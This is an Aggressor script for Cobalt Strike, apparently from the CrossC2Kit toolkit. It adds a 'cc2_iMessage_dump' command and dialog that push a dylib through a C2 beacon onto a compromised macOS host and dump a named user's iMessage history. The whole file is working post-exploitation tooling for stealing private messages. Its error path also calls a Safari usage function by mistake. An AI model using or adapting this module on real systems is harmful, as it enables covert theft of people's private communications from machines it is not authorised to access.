
# include(script_resource("CrossC2Kit.cna"));

sub printUsage_iMessage_dump {
    blog($1, "\nUsage: cc2_iMessage_dump <username> <dump count>\n\tdump message from iMessage.\nEx:\n\tcc2_iMessage_dump test 100");
}

sub cc2_iMessage_dump {
    $taskName = "cc2_iMessage_dump"; # taskName
    $taskType = "dylib";  # $taskType -> ELF, MachO, so, dylib
    $taskResType = "info"; # keystrokes -> keylogger message

    $beaconid = $1;
    $username = $2;
    $queryCount = $3;
    $transportArg = $username."^".$queryCount;

    if ($username && $queryCount) {
        $loadlib = "gather/message/cc2_iMessage_dump.dylib";
        blog($beaconid, "cc2_iMessage_dump: ");
        bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else {
        printUsage_safari_dump($beaconid);
    }

}

ssh_alias("cc2_iMessage_dump", &cc2_iMessage_dump);

ssh_command_register("cc2_iMessage_dump", "CrossC2 iMessage dump - dump message from iMessage.", "\nUsage: cc2_iMessage_dump <username> <dump count>\n\tdump message from iMessage.\nEx:\n\tcc2_iMessage_dump test 100");

sub openIMessageDumpDialogCallBack {
    $bid = $3['bid'];
    $username = $3['d_username'];
    $queryCount = $3['d_count'];
    binput($bid, "cc2_iMessage_dump $username $queryCount");
    cc2_iMessage_dump($bid, $username, $queryCount);
}

sub openIMessageDumpDialog {
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("CrossC2 iMessage dump", %(bid => $bid[0], d_username => "test", d_count => "100"), &openIMessageDumpDialogCallBack);
    dialog_description($dialog, "dump message from iMessage");

    drow_text($dialog, "d_username", "username: ", 20); 
    drow_text($dialog, "d_count", "history count: ", 20);

    dbutton_action($dialog, "run");
    dialog_show($dialog);
}

sub cc2_iMessage_dump_status {
    local('$bid $os $arch $system');
    $bid = $1;
    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");
    if ('macos' isin $os) {
        return 'MacOS(intel)';
    }
    return '';
}